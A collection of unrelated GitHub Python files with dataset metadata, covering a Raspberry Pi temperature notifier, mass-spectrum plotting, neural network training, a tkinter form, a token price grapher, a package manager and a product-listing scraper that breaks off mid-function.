with open("assets/notification_sound.wav", 'rb') as sound_file:
show_notification.sound_pcm = sound_file.read()
client.send(oap_api.MESSAGE_SHOW_NOTIFICATION, 0,
show_notification.SerializeToString())
self._timer = threading.Timer(60, self.show_notification, [client])
self._timer.start()
def get_notification_channel_id(self):
return self._notification_channel_id
def get_timer(self):
return self._timer
def main():
client = Client("cpu temp notification")
event_handler = EventHandler()
client.set_event_handler(event_handler)
client.connect('127.0.0.1', 44405)
active = True
while active:
try:
active = client.wait_for_message()
except KeyboardInterrupt:
break
if event_handler.get_timer() is not None:
event_handler.get_timer().cancel()
if event_handler.get_notification_channel_id() is not None:
unregister_notification_channel = oap_api.UnregisterNotificationChannel(
)
unregister_notification_channel.id = event_handler.get_notification_channel_id(
)
client.send(oap_api.MESSAGE_UNREGISTER_NOTIFICATION_CHANNEL, 0,
unregister_notification_channel.SerializeToString())
client.disconnect()
if __name__ == "__main__":
main()
| tigattack/CarPi | pi/scripts/cpu_temp_monitor.py | cpu_temp_monitor.py | py | 3,828 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "gpiozero.CPUTemperature",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "common.Client.ClientEventHandler",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "common.Api_pb2.RegisterNotificationChannelRequest",
"line_number": 25,
"usage_ty... |
38367714869 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun May 21 13:23:27 2017
Plots two mass spectra on one set of axes and notates m/z of the peak(s)
with the highest relative intensity.
@author: emeryusher
"""
# import python modules for plotting etc.
import numpy as np
import matplotlib.pyplot as plt
from scipy.signal import argrelextrema
# import files into two separate arrays (one is the control; one is the reaction)
temp1 = np.loadtxt('chloro_ref_rxnA_0_F3_1.txt')
temp2 = np.loadtxt('chloro_ref_rxnC_0_F5_1.txt')
# normalize data set to the maximum intensity in the dataset
temp1[:,1] = temp1[:,1]/(np.amax(temp1[:,1]))
temp2[:,1] = temp2[:,1]/(np.amax(temp2[:,1]))
# determine local extrema; if you find that it picks too many peaks, increase
# the value for "order"
max1 = argrelextrema(temp1[:,1], np.greater, order = 5000)
max2 = argrelextrema(temp2[:,1], np.greater, order = 5000)
#plot intensity versus m/z
plt.plot(temp1[:,0], temp1[:,1], color = "grey", linewidth = 1.0, label = 'H3K9R')
plt.plot(temp2[:,0], temp2[:,1], color = "k", linewidth = 1.0, label = 'H3K9RMe')
# enter the bounds to be used for picking the maxima to plot (m/z)
win1_max = 2300
win1_min = 2200
win2_max = 2400
win2_min = 2200
# pick extrema for each data set
for i in max1[0]:
# Conditional statement to calculate maxima of points in a specfic range.
# adds a m/z label for picked maxima
if ((temp1[:,0][i] > win1_) and (temp1[:,0][i] < 2300 )):
plt.annotate(str(temp1[:,0][i]), xy=(temp1[:,0][i], temp1[:,1][i]+0.1), horizontalalignment = 'center', fontsize = 8, rotation=45)
for i in max2[0]:
# Conditional statement to calculate maxima of points in a specfic range.
# adds a m/z label for picked maxima
if ((temp2[:,0][i] > 2200 ) and (temp2[:,0][i] < 2400 )):
plt.annotate(str(temp2[:,0][i]), xy=(temp2[:,0][i], temp2[:,1][i]+0.1), horizontalalignment = 'center', fontsize = 8, rotation=45)
## plotting stuff ##
plt.legend(loc='upper right')
plt.xlabel('m/z')
plt.ylabel('Intensity')
plt.title('H3K9R peptide methylation')
plt.xlim(2240, 2340)
plt.ylim([-0.05, 1.2])
plt.tight_layout()
# uncomment the following line to save spectrum plot
#plt.savefig('PRDM9_methylation.png', format = 'png', dpi = 300)
plt.show()
| idpemery/random-python-scripts | MS_ref_overlay.py | MS_ref_overlay.py | py | 2,275 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "numpy.loadtxt",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "numpy.loadtxt",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "numpy.amax",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "numpy.amax",
"line_number"... |
28389679037 | from networks import AdaINGen, VAEGen, NetV2_128x128
from utils import weights_init, get_model_list, vgg_preprocess, load_vgg16, load_vgg19, get_scheduler
from torch.autograd import Variable
import torch
import torch.nn as nn
import os
class FACE_Trainer(nn.Module):
def __init__(self, hyperparameters):
super(FACE_Trainer, self).__init__()
lr = hyperparameters['lr']
# Initiate the networks
if hyperparameters['net_version'] == 'v2' and hyperparameters['crop_image_height'] == 128:
self.gen = NetV2_128x128(hyperparameters['input_dim_a'], hyperparameters['input_dim_b'], hyperparameters['input_dim_a'])
self.instancenorm = nn.InstanceNorm2d(512, affine=False)
# Setup the optimizers
beta1 = hyperparameters['beta1']
beta2 = hyperparameters['beta2']
gen_params = list(self.gen.parameters())
self.gen_opt = torch.optim.Adam([p for p in gen_params if p.requires_grad],
lr=lr, betas=(beta1, beta2), weight_decay=hyperparameters['weight_decay'])
self.gen_scheduler = get_scheduler(self.gen_opt, hyperparameters)
self.l1loss = nn.L1Loss(size_average=True)
# Network weight initialization
self.apply(weights_init(hyperparameters['init']))
# Load VGG model if needed
if 'vgg_w' in hyperparameters.keys() and hyperparameters['vgg_w'] > 0:
if 'vgg_net' == 'vgg16':
self.vgg = load_vgg16(hyperparameters['vgg_model_path'] + '/models')
self.vgg.eval()
for param in self.vgg.parameters():
param.requires_grad = False
else:
self.vgg = load_vgg19()
self.vgg.eval()
def recon_criterion(self, input, target):
return torch.mean(torch.abs(input-target))
def forward(self, x_a, x_b):
self.eval()
output = self.gen(x_a,x_b)
self.train()
return output
def __latent_kl(self, p, q):
mean_1 = p
mean_2 = q
kl_loss = 0.5 * torch.pow(mean_1-mean_2, 2)
kl_loss = torch.mean(kl_loss)
return kl_loss
def gen_update(self, x, y, hyperparameters):
self.gen_opt.zero_grad()
output = self.gen(x, y)
self.loss_gen_recon = 0
self.loss_gen_recon_kl_1 = 0
self.loss_gen_recon_kl_2 = 0
self.loss_gen_vgg = 0
# reconstruction loss
if hyperparameters['recon_w'] != 0:
self.loss_gen_recon = self.recon_criterion(output[-1], x)
if hyperparameters['kl_w'] != 0:
self.loss_gen_recon_kl_1 = self.__latent_kl(output[0], output[2])
self.loss_gen_recon_kl_2 = self.__latent_kl(output[1], output[3])
# perceptual loss
if hyperparameters['vgg_w'] != 0:
self.loss_gen_vgg = self.compute_vgg_loss(self.vgg, output[-1], x, hyperparameters) if hyperparameters['vgg_w'] > 0 else 0
# total loss
# self.loss_gen_total = hyperparameters['recon_w'] * self.loss_gen_recon + \
# hyperparameters['kl_w'] * self.loss_gen_recon_kl_1 + \
# hyperparameters['kl_w'] * self.loss_gen_recon_kl_2 + \
# hyperparameters['vgg_w'] * self.loss_gen_vgg
self.loss_gen_total = hyperparameters['recon_w'] * self.loss_gen_recon + \
hyperparameters['kl_w'] * self.loss_gen_recon_kl_1 + \
hyperparameters['kl_w'] * self.loss_gen_recon_kl_2 + \
hyperparameters['vgg_w'] * self.loss_gen_vgg
self.loss_gen_total.backward()
self.gen_opt.step()
def compute_vgg_loss(self, vgg, img, target, hyperparameters):
img_vgg = vgg_preprocess(img)
target_vgg = vgg_preprocess(target)
img_fea = vgg(img_vgg)
target_fea = vgg(target_vgg)
total_loss = 0
for i in range(len(img_fea)):
total_loss += hyperparameters['feature_weights'][i] * torch.mean(torch.abs(img_fea[i]-target_fea[i]))
return total_loss
def sample(self, x_a, x_b):
self.eval()
x_a_recon, x_b_recon, x_ba, x_ab = [], [], [], []
for i in range(x_a.size(0)):
x_ba.append(self.gen_a.decode(h_b))
x_ab.append(self.gen_b.decode(h_a))
x_a_recon, x_b_recon = torch.cat(x_a_recon), torch.cat(x_b_recon)
x_ba = torch.cat(x_ba)
x_ab = torch.cat(x_ab)
self.train()
return x_a, x_a_recon, x_ab, x_b, x_b_recon, x_ba
def transfer(self,x_a,x_b):
self.eval()
out = self.gen(x_a,x_b)
self.train()
return out
def update_learning_rate(self):
if self.gen_scheduler is not None:
self.gen_scheduler.step()
def resume(self, checkpoint_dir, hyperparameters):
# Load generators
last_model_name = get_model_list(checkpoint_dir, "gen")
state_dict = torch.load(last_model_name)
self.gen.load_state_dict(state_dict['gen_weight'])
iterations = int(last_model_name[-11:-3])
# Load optimizers
state_dict = torch.load(os.path.join(checkpoint_dir, 'optimizer.pt'))
self.gen_opt.load_state_dict(state_dict['gen'])
# Reinitilize schedulers
self.gen_scheduler = get_scheduler(self.gen_opt, hyperparameters, iterations)
print('Resume from iteration %d' % iterations)
return iterations
def save(self, snapshot_dir, iterations):
# Save generators, and optimizers
gen_name = os.path.join(snapshot_dir, 'gen_%08d.pt' % (iterations + 1))
opt_name = os.path.join(snapshot_dir, 'optimizer.pt')
torch.save({'gen_weight': self.gen.state_dict()}, gen_name)
torch.save({'gen': self.gen_opt.state_dict()}, opt_name)
| TheSouthFrog/stylealign | pytorch_code/trainer.py | trainer.py | py | 5,877 | python | en | code | 182 | github-code | 1 | [
{
"api_name": "torch.nn.Module",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "networks.NetV2_128x128",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "torch.nn.InstanceN... |
31891970363 | from termcolor import cprint
from tkinter import *
from ttkthemes import themed_tk
from tkinter import ttk , messagebox, filedialog
from PIL import Image, ImageTk
vendara = ['Vendara', 14]
root = themed_tk.ThemedTk()
root.geometry('900x600+500+200')
root.title('Admission-helper: Administrator Version')
root.set_theme('plastik')
# Functions
def callback():
print(name_var.get())
print(age_var.get())
æ = parent_var.get().split(',')
ś = []
for ā in æ:
if ā.replace(' ','') != '':
ś.append(ā.replace(' ', ''))
del æ
æ = ś
del ś
print(æ)
messagebox.showinfo('Info!', 'Admission succesfully added!')
def parents():
messagebox.showinfo('Help', 'Parent name(s) seperated by commas(spaces not allowed!)\n\nexample:\n\n parent.A, parent.B')
# Vars
name_var = StringVar()
age_var = IntVar()
age_var.set(6)
parent_var = StringVar()
parent_info = ImageTk.PhotoImage(image=Image.open('assets/icons/info-sign-icon.png'))
min_age = 6
max_age = 18
ages = []
for i in range(min_age, max_age + 1):
ages.append(i)
# Buttons
submit_btn = ttk.Button(root, text='Submit', command=callback, width=12)
btn_pname_info = Button(root, image=parent_info, border=0, command=parents)
# Labels
lbl_sname = ttk.Label(root, font=vendara, text='Student Full Name:', )
lbl_sage = ttk.Label(root, font=vendara, text='Student Age:')
lbl_pname = ttk.Label(root, font=vendara, text='Parent Name(s):')
# Entrys
ent_sname = ttk.Entry(root, font=vendara, textvariable=name_var ,width=50)
ent_sage = ttk.Spinbox(root, font=vendara, textvariable=age_var ,width=48, values=ages, state='readonly')
ent_pname = ttk.Entry(root, font=vendara, textvariable=parent_var, width=50)
# grid
lbl_sname.grid(row=0, column=0)
ent_sname.grid(row=0, column=1, pady=10)
lbl_sage.grid(row=1, column=0)
ent_sage.grid(row=1, column=1)
lbl_pname.grid(row=2, column=0)
ent_pname.grid(row=2, column=1, pady=10)
btn_pname_info.grid(row=2, column=2, ipadx=10)
submit_btn.grid(row=3, column=0)
root.resizable(False, False)
# Mainloop
if __name__ == '__main__':
root.mainloop()
| Advik-B/Admission-helper | main.py | main.py | py | 2,112 | python | en | code | 3 | github-code | 1 | [
{
"api_name": "ttkthemes.themed_tk.ThemedTk",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "ttkthemes.themed_tk",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "tkinter.messagebox.showinfo",
"line_number": 26,
"usage_type": "call"
},
{
"api_na... |
37869013076 | import numpy as np
import pandas as pd
import cv2
from sklearn.model_selection import train_test_split
import tensorflow as tf
import keras
from keras.models import Model
from keras.models import load_model
from keras.layers import Input, Dense, Concatenate
from keras.layers import Dense, GlobalAveragePooling2D, Dropout, UpSampling2D, Conv2D, MaxPooling2D, Activation, Dropout
from keras.optimizers import adam_v2
from keras import backend as K
# Metrics
def dice_coeff(y_true, y_pred):
smooth = 1.
# Flatten
y_true_f = tf.reshape(y_true, [-1])
y_pred_f = tf.reshape(y_pred, [-1])
intersection = tf.reduce_sum(y_true_f * y_pred_f)
score = (2. * intersection + smooth) / (tf.reduce_sum(y_true_f) + tf.reduce_sum(y_pred_f) + smooth)
return score
def recall(y_true, y_pred):
true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))
possible_positives = K.sum(K.round(K.clip(y_true, 0, 1)))
recall_keras = true_positives / (possible_positives + K.epsilon())
return recall_keras
def precision(y_true, y_pred):
true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))
predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))
precision_keras = true_positives / (predicted_positives + K.epsilon())
return precision_keras
def f1(y_true, y_pred):
p = precision(y_true, y_pred)
r = recall(y_true, y_pred)
return 2 * ((p * r) / (p + r + K.epsilon()))
# Load data
masks = pd.read_csv('train_ship_segmentations_v2.csv')
print('CSV file loaded')
# Split data to train, validation and test sets (70:28:2)
train_df = masks[:230000]
test_df = masks[230000:]
test_df.reset_index(drop = True, inplace = True)
train_df = train_df.dropna(axis = 'index') # images without ships don't need for train
train_df, val_df = train_test_split (train_df, test_size = 0.3, random_state = 42)
# Function fo decoding lables to masks
def rle_decode(mask_rle, shape = (768, 768)):
s = mask_rle.split()
starts, lengths = [np.asarray(x, dtype=int) for x in (s[0:][::2], s[1:][::2])]
starts -= 1
ends = starts + lengths
img = np.zeros(shape[0] * shape[1], dtype = np.uint8)
for lo, hi in zip(starts, ends):
img[lo:hi] = 1
return img.reshape(shape).T
# Generators for Model training (to reduce memory usage)
def img_generator(gen_df, batch_size):
while True:
x_batch = []
y_batch = []
for i in range(batch_size):
img_name, mask_rle = gen_df.sample(1).values[0] # get row from DF
img = cv2.imread('train_v2/'+ img_name) # read img
img_masks = masks.loc[masks['ImageId'] == img_name, 'EncodedPixels'].tolist()
all_masks = np.zeros((768, 768)) # find ship masks for more the one ship
for mask in img_masks: # create a single mask for all ships
all_masks += rle_decode(mask)
img = cv2.resize(img, (256, 256)) # resize img to 256,256
mask = cv2.resize(all_masks, (256, 256)) # resize mask to 256,256
x_batch += [img] # put into batch
y_batch += [mask]
x_batch = np.array(x_batch) / 255. # reduce color dimension img
y_batch = np.array(y_batch)
yield x_batch, np.expand_dims(y_batch, -1) # return batch
# Make the Model
inp = Input(shape=(256, 256, 3)) # input layer with shape 256x256 and 3 chanels
conv_1_1 = Conv2D(32, (3, 3), padding = 'same')(inp) # increase filters number to 32, kernel size 3x3
conv_1_1 = Activation('relu')(conv_1_1)
conv_1_2 = Conv2D(32, (3, 3), padding = 'same')(conv_1_1)
conv_1_2 = Activation('relu')(conv_1_2)
pool_1 = MaxPooling2D(2)(conv_1_2) # reduce image size
conv_2_1 = Conv2D(64, (3, 3), padding = 'same')(pool_1) # increase filters number to 64
conv_2_1 = Activation('relu')(conv_2_1)
conv_2_2 = Conv2D(64, (3, 3), padding = 'same')(conv_2_1)
conv_2_2 = Activation('relu')(conv_2_2)
pool_2 = MaxPooling2D(2)(conv_2_2) # reduce image size
conv_3_1 = Conv2D(128, (3, 3), padding = 'same')(pool_2) # increase filters number to 128
conv_3_1 = Activation('relu')(conv_3_1)
conv_3_2 = Conv2D(128, (3, 3), padding = 'same')(conv_3_1)
conv_3_2 = Activation('relu')(conv_3_2)
pool_3 = MaxPooling2D(2)(conv_3_2) # reduce image size
conv_4_1 = Conv2D(256, (3, 3), padding = 'same')(pool_3) # increase filters number to 256
conv_4_1 = Activation('relu')(conv_4_1)
conv_4_2 = Conv2D(256, (3, 3), padding = 'same')(conv_4_1)
conv_4_2 = Activation('relu')(conv_4_2)
pool_4 = MaxPooling2D(2)(conv_4_2) # reduce image size
up_1 = UpSampling2D(2, interpolation = 'bilinear')(pool_4) # increase image size
conc_1 = Concatenate()([conv_4_2, up_1]) # concatenate withe the same size layer before upsampling to get low level info
conv_up_1_1 = Conv2D(256, (3, 3), padding = 'same')(conc_1)
conv_up_1_1 = Activation('relu')(conv_up_1_1)
conv_up_1_2 = Conv2D(256, (3, 3), padding = 'same')(conv_up_1_1)
conv_up_1_2 = Activation('relu')(conv_up_1_2)
up_2 = UpSampling2D(2, interpolation = 'bilinear')(conv_up_1_2) # increase image size
conc_2 = Concatenate()([conv_3_2, up_2]) # concatenate withe the same size layer before upsampling to get low level info
conv_up_2_1 = Conv2D(128, (3, 3), padding = 'same')(conc_2) # reduce filter number to 128
conv_up_2_1 = Activation('relu')(conv_up_2_1)
conv_up_2_2 = Conv2D(128, (3, 3), padding = 'same')(conv_up_2_1)
conv_up_2_2 = Activation('relu')(conv_up_2_2)
up_3 = UpSampling2D(2, interpolation = 'bilinear')(conv_up_2_2) # increase image size
conc_3 = Concatenate()([conv_2_2, up_3]) # concatenate withe the same size layer before upsampling to get low level info
conv_up_3_1 = Conv2D(64, (3, 3), padding = 'same')(conc_3) # reduce filter number to 64
conv_up_3_1 = Activation('relu')(conv_up_3_1)
conv_up_3_2 = Conv2D(64, (3, 3), padding='same')(conv_up_3_1)
conv_up_3_2 = Activation('relu')(conv_up_3_2)
up_4 = UpSampling2D(2, interpolation = 'bilinear')(conv_up_3_2) # increase image size
conc_4 = Concatenate()([conv_1_2, up_4]) # concatenate withe the same size layer before upsampling to get low level info
conv_up_4_1 = Conv2D(32, (3, 3), padding = 'same')(conc_4) # reduce filter number to 32
conv_up_4_1 = Activation('relu')(conv_up_4_1)
conv_up_4_2 = Conv2D(1, (3, 3), padding = 'same')(conv_up_4_1)
conv_up_4_3 = Dropout(0.5)(conv_up_4_2) # avoid overfitting
result = Activation('sigmoid')(conv_up_4_3) # otput layer with sigmoid activation to get probability is a pixel ship
model = Model(inputs = inp, outputs = result)
best_w = keras.callbacks.ModelCheckpoint('r34_best.h5', # save best weights during training
monitor = 'val_loss',
verbose = 0,
save_best_only = True,
save_weights_only = True,
mode = 'auto',
period = 1)
last_w = keras.callbacks.ModelCheckpoint('r34_last.h5', # save last weights during training
monitor = 'val_loss',
verbose = 0,
save_best_only = False,
save_weights_only = True,
mode='auto',
period=1)
callbacks = [best_w, last_w]
adam = tf.keras.optimizers.Adam(learning_rate = 0.0001,
beta_1 = 0.9,
beta_2 = 0.999,
epsilon = 1e-08,
decay = 0.0)
model.compile(adam, 'binary_crossentropy', [f1, dice_coeff])
batch_size = 16
print ('Training is started')
model.fit(img_generator(train_df, batch_size),
steps_per_epoch = 100,
epochs = 300,
verbose = 1,
callbacks = callbacks,
validation_data = img_generator(val_df, batch_size),
validation_steps = 10,
class_weight = None,
max_queue_size = 10,
workers = 1,
use_multiprocessing = False,
shuffle = True,
initial_epoch = 0)
# Save the Model
model.save('last_saved_model.h5')
print('Training completed successfully and the Model has been saved to a file "last_saved_model.h5"')
| anton500nb/ship_detection | model.py | model.py | py | 9,000 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "tensorflow.reshape",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "tensorflow.reshape",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "tensorflow.reduce_sum",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "tensorflo... |
32958345548 | from argparse import ArgumentParser
from time import sleep
from src.netreq import setContractAddress, requestPrice, requestSymbol
from src.grapher import setGraphSymbol, startGraphThread,addPrice, initanim
from src.contracts import contract_list
import threading
def priceThread():
while True:
price = requestPrice()
if price is not None:
addPrice(price)
else:
print("An error occured while trying to get the price for token")
sleep(4) # As observed from Trader Joe's request intervals
if __name__ == "__main__":
parser = ArgumentParser(
prog="acpy",
description="A python script that utilizes graphql traderjoe subgraph to pull prices from Avalanche's C-Chain tokens")
parser.add_argument("-c", "--contract", help="Address of the contract present on the C-Chain")
parser.add_argument("--token", "-t", choices=contract_list.keys(), required=False, default="PNG", help="Use a built in contract address if you prefer")
args = parser.parse_args()
if args.contract is None and args.token is None:
parser.print_help()
exit(0)
contract_addr = ""
if args.token is not None:
contract_addr = contract_list[args.token]
else:
contract_addr = args.contract
symbol = setContractAddress(contract_addr)
if symbol is None:
print("Error while getting the contract symbol.")
exit(1)
setGraphSymbol(symbol)
initanim()
pricethread = threading.Thread(target=priceThread)
pricethread.start()
startGraphThread()
| gAtrium/acpy | acpy.py | acpy.py | py | 1,591 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "src.netreq.requestPrice",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "src.grapher.addPrice",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "time.sleep",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "argparse.Argu... |
8343142681 | from bs4 import BeautifulSoup
import requests
country = raw_input("Enter the country:")
#print(country)
site_to_scrape = "https://en.wikipedia.org/wiki/List_of_national_capitals_and_largest_cities_by_country"
r = requests.get(site_to_scrape)
data = r.text
soup = BeautifulSoup(data)
print("Capital: "+soup.find('a',title=country).parent.findNext('td').find('a').string)
| deathBlad3/capitalCities | capitalCity.py | capitalCity.py | py | 373 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "requests.get",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 10,
"usage_type": "call"
}
] |
18722144626 | """
@package square_connect.report.management.commands.get_recent_transactions
Gets the most recent transactions from the primary storefronts and adds any selected items to the report database.
We recommend that you run it in a cron job.
"""
from django.core.management.base import BaseCommand, CommandError
from django.conf import settings
from app.models import Service
from report.models import Report, Item
from data.transaction import PaymentRequest
class Command(BaseCommand):
help = "Gets the last 200 transactions at each service and finds ___-marked items"
# Allows input of report types to take in. Ex. spoilage and shift drinks.
def add_arguments(self, parser):
parser.add_argument('report_type', nargs='+')
def handle(self, *args, **options):
# Refresh the Services if necessary
if Service.objects.count() == 0:
Service.regenerate_services()
# Run for each service with discounts
services = Service.objects.exclude(name__in=settings.SERVICE_EXCLUDES)
for service in services:
# Get the recent transactions for that service
sales_json = PaymentRequest(merchant_id=service.merchant_id).auto()
# Pass the sales to the report model so it can do its magic
for report_type in options['report_type']:
Report.add_items_from_json_data(sales_json, service)
| TrianglePlusPlus/howitzer | square_connect/square_connect/report/management/commands/get_recent_transactions.py | get_recent_transactions.py | py | 1,410 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "django.core.management.base.BaseCommand",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "app.models.Service.objects.count",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "app.models.Service.objects",
"line_number": 22,
"usage_type": "a... |
31669588144 | # -*- coding: utf-8 -*-
# !/usr/bin/env python
# @Time : 2019-08-06 16:16
# @Author : lidong@immusician.com
# @Site :
# @File : base.py
import requests
from UnitTest.settings import HOST, PORT, HEADERS
class BaseResponse:
def __init__(self):
pass
class BaseRequest:
def __init__(self, host=None, port=None):
self._host = host
if not self._host:
self._host = HOST
self._port = port
if not self._port:
self._port = PORT
self.__url = self._host + ":" + str(self._port)
self.__headers = HEADERS
def _check_url_and_headers(self, url, headers):
url = self.__url + url
if not headers:
headers = self.__headers
return url, headers
def get(self, url, param=None, **kwargs):
headers = kwargs.get("headers", None)
url, headers = self._check_url_and_headers(url, headers)
return requests.get(url, param, headers=headers, **kwargs)
def post(self, url, json=None, **kwargs):
headers = kwargs.get("headers", None)
url, headers = self._check_url_and_headers(url, headers)
return requests.post(url, json=json, headers=headers)
def run(self):
dir_list = self.__dir__()
for func in dir_list:
if not func.startswith("_"):
if func not in ["get", 'post', 'run']:
getattr(self, func)()
# self._show_data(func, url, ret)
@staticmethod
def _show_data(func_name, url, response):
print("*"*10, func_name, "*"*10)
print("")
print("url: ", url)
print("status: ", response.status_code)
print("json: ", response.json())
print("")
print("")
if __name__ == '__main__':
BaseRequest().run()
| Fushengliangnian/PracticeEssays | UnitTest/base.py | base.py | py | 1,821 | python | en | code | 2 | github-code | 1 | [
{
"api_name": "UnitTest.settings.HOST",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "UnitTest.settings.PORT",
"line_number": 25,
"usage_type": "name"
},
{
"api_name": "UnitTest.settings.HEADERS",
"line_number": 28,
"usage_type": "name"
},
{
"api_name"... |
19194610924 | #YAPI Rewrite - Yet Another Package Manager
#Imports
import modules.config_import as config_import
import modules.installer as installer
import gui.interface as interface
import modules.search as search
import json
import sys
import os
try:
os.chdir(os.path.dirname(__file__)) #Change file location if outside of YAPI
except:
pass #Already in directory of YAPI.
if len(sys.argv) != 2:
try:
config = json.loads(config_import.get_config())
os_platform = config['OS.platform']
cache_boolean = ('True' == config['Cache.keep_cache'])
cache_location = config['Cache.cache_location']
search_local = ('True' == config['Search.search_local'])
search_url = config['Search.search_url']
remote_location = config['Remote.location']
remote_branch = config['Remote.branch']
file_extension = config['Remote.file_extension']
language_selected = config['Languages.selected']
except:
print('Config not able to be imported. Run \"python3 yapi.py config\" to fix the error')
#Main Program
if len(sys.argv) == 1:
result = interface.start()
elif len(sys.argv) == 2:
if sys.argv[1] == 'config':
config_import.update_config()
elif len(sys.argv) == 3:
if sys.argv[1] == 'search':
matches = search.search(search_url, file_extension, search_local, cache_location, sys.argv[2])
for match in matches:
print(match)
elif sys.argv[1] == 'download':
file_name = sys.argv[2] + file_extension
file_url = remote_location + os_platform + '/' + remote_branch + '/scripts/' + file_name
os.chdir(cache_location)
output = installer.get_file(file_url, file_name)
elif sys.argv[1] == 'run':
file_name = sys.argv[2] + file_extension
os.chdir(cache_location)
output = installer.run_script(file_name, cache_boolean)
elif sys.argv[1] == 'install':
output = installer.full_install(sys.argv[2])
| Wabri/rewrite | yapi.py | yapi.py | py | 1,975 | python | en | code | 3 | github-code | 1 | [
{
"api_name": "os.chdir",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.path.dirname",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "sys.argv",
"line_number": 1... |
72625343714 | import json
import csv
import requests
from bs4 import BeautifulSoup
# ▒█▀▄▒█▀▄ lab. PR | FAF | FCIM | UTM | Fall 2023
# ░█▀▒░█▀▄ FAF-212 Cristian Brinza lab2 homework
print('')
print('▒█▀▄▒█▀▄ lab. PR | FAF | FCIM | UTM | Fall 2023')
print('░█▀▒░█▀▄ FAF-212 Cristian Brinza lab2 homework ')
print('')
# User-Agent Rotation: List of user agents to mimic different browsers.
USER_AGENTS = [
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.3',
# Add more user agents if needed
]
def fetch_web_content(product_url):
"""Fetches the content of the given URL."""
# User-Agent Rotation: Select a user agent based on the hash of the URL.
headers = {
'User-Agent': USER_AGENTS[hash(product_url) % len(USER_AGENTS)]
}
try:
# Error Handling: Catch network errors or invalid URLs.
response = requests.get(product_url, headers=headers)
response.raise_for_status()
return BeautifulSoup(response.content, 'html.parser')
except requests.RequestException as e:
print(f"Error fetching URL {product_url}. Error: {e}")
return None
def extract_owner_details(parsed_content):
"""Extracts the owner details from the parsed content."""
owner_details = {}
owner_section = parsed_content.find('dl', {'class': 'adPage__aside__stats__owner'})
owner_details['Name'] = owner_section.find('a', {'class': 'adPage__aside__stats__owner__login buyer_experiment'}).text
owner_details['On website since'] = owner_section.find('span').text
last_update_section = owner_section.find_next('div')
owner_details['Last Update'] = last_update_section.text
ad_type_section = last_update_section.find_next('div')
owner_details['Ad type'] = ad_type_section.text
views_section = ad_type_section.find_next('div')
owner_details['Views'] = views_section.text
return owner_details
def extract_product_info(parsed_content):
"""Extracts product information from the parsed content."""
product_info = {}
description_section = parsed_content.find('div', {'class': 'adPage__content__description grid_18'})
if description_section:
product_info['Description'] = description_section.text
else:
product_info['Description'] = 'Description not found.'
features_section = parsed_content.find('div', {'class': 'adPage__content__features'}).find_all('h2')
for feature in features_section:
feature_details = {}
ul_section = feature.find_next('ul')
if ul_section:
list_items = ul_section.find_all('li')
for item in list_items:
spans = item.find_all('span')
if len(spans) == 2:
feature_details[spans[0].text] = spans[1].text
else:
feature_details[spans[0].text] = 'None'
product_info[feature.text] = feature_details
return product_info
def export_to_csv(filename, data_list):
"""Exports the scraped data to a CSV file."""
# Export to CSV: Write the scraped data into a CSV format.
keys = data_list[0].keys()
with open(filename, 'w', newline='') as output_file:
dict_writer = csv.DictWriter(output_file, keys)
dict_writer.writeheader()
dict_writer.writerows(data_list)
def read_urls_from_file(filename):
"""Reads URLs from a given file."""
with open(filename, 'r') as file:
return [url.strip() for url in file.readlines()]
def main():
"""Main function to interact with the user and perform operations."""
all_data = []
while True:
print("\n--- Menu ---")
print("1. Scrape product details")
print("2. Scrape product details from a .txt file")
print("3. Export all scraped data")
print("4. Exit")
choice = input("Enter your choice: ")
if choice == "1":
# Scrape Multiple URLs: Allow user to input multiple URLs separated by commas.
target_urls = input("Enter the product URLs (comma-separated): ").split(',')
for url in target_urls:
parsed_content = fetch_web_content(url.strip())
if parsed_content:
owner_details = extract_owner_details(parsed_content)
product_info = extract_product_info(parsed_content)
final_data = {
'URL': url,
'Owner Details': owner_details,
'Product Info': product_info
}
all_data.append(final_data)
print(f"Scraped data for {url}")
elif choice == "2":
# Scrape URLs from a .txt file
file_path = input("Enter the path to the .txt file containing the product URLs (without extension): ")+".txt"
try:
target_urls = read_urls_from_file(file_path)
for url in target_urls:
parsed_content = fetch_web_content(url)
if parsed_content:
owner_details = extract_owner_details(parsed_content)
product_info = extract_product_info(parsed_content)
final_data = {
'URL': url,
'Owner Details': owner_details,
'Product Info': product_info
}
all_data.append(final_data)
